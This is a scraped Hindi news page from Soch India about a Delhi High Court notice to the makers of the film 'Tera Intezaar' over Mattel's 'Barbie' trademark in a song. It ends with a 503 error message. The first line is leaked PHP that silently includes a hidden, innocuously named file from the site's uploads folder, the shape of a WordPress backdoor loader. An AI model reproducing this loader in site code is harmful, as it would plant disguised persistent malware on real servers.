add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सनी लियोनी की फिल्म को मिला दिल्ली हाई कोर्ट का नेटिस, ‘बार्बी गर्ल’ का है मामला – SOCH INDIA
Menu

मनोरंजन
सनी लियोनी की फिल्म को मिला दिल्ली हाई कोर्ट का नेटिस, ‘बार्बी गर्ल’ का है मामला

nobanner

सनी लियोनी और अरबाज खान की आने वाली फिल्म ‘तेरा इंतजार’ कुछ मुश्किलों में फंसती नजर आ रही है. फिल्म के प्रोड्यूसर्स को दिल्ली उच्च न्यायालय की तरफ से नोटिस जारी किया गया है.

कुछ ही दिनों पहले फिल्म का गाना रिलीज किया गया था जिसमें ‘बार्बी’ शब्द का इस्तेमाल किया गया है वो भी मैटल इंक की इ्जाजत के बिना. मैटल इंक ट्रेडमार्क बार्बी गुड़िया के निर्माता हैं. न्यायमूर्ति राजीव सहाय की एक एकल न्यायाधीश बेंच ने खिलौना कंपनी और फिल्दोम मेकर्स दोनों पक्षों को शांति से मामला सुलझाने की सलाह दी है.

इसके साथ ही अदालत ने यह भी कहा कि याचिका को नोटिस स्टेज में माना जा सकता है। याचिकर्ता का कहना है कि गाने से ‘बार्बी’ शब्द हटाया जाए क्योंकि ये उनका ट्रेडमार्क है. इसके साथ ही उन्होंने ये भी कहा है कि यदि ऐसा नहीं किया गया तो उन्हें खामियाजा भुगतना पड़ सकता है.

आपको बता दें कि कुछ ही दिनों पहले सनी लियोनी और अरबाज खान की आने वाली फिल्म ‘तेरा इंतजार’ का गाना ‘बार्बी गर्ल’ रिलीज किया था. ये विवाद इसी गाने से जुड़ है.

इस फर्म का कहना है कि सनी लियोनी को अडल्ड फिल्मों के लिए जाना जाता है इसलिए ये गाना बच्चों के लिहाज से ठीक नहीं है. अपील में कहा गया है कि इससे ‘बार्बी’ की छवि पर भी गलत असर पड़ेगा.

न्यायमूर्ति राजीव का कहना है कि अगर इस फिल्म को सेंसर बोर्ड ने ‘बार्बी’ शब्द से साथ पास दिया तो अंत में फिल्म को सेंसर करने का निर्णय अदालत का होगा. फिल्म की बात करें को ये फिल्म 1 दिसंबर को रिलीज होने वाली है.

फिल्म के गाने, पोस्टर्स और ट्रेलर पहले ही रिलीज कर दिए गए हैं. ऐसे में देखना ये होगा कि फिल्म किसी विवाद में न फंसे. इस फिल्म के साथ ही पहली बार सनी लियोनी और अरबाज खान एक साथ पर्दे पर नजर आने वाले हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.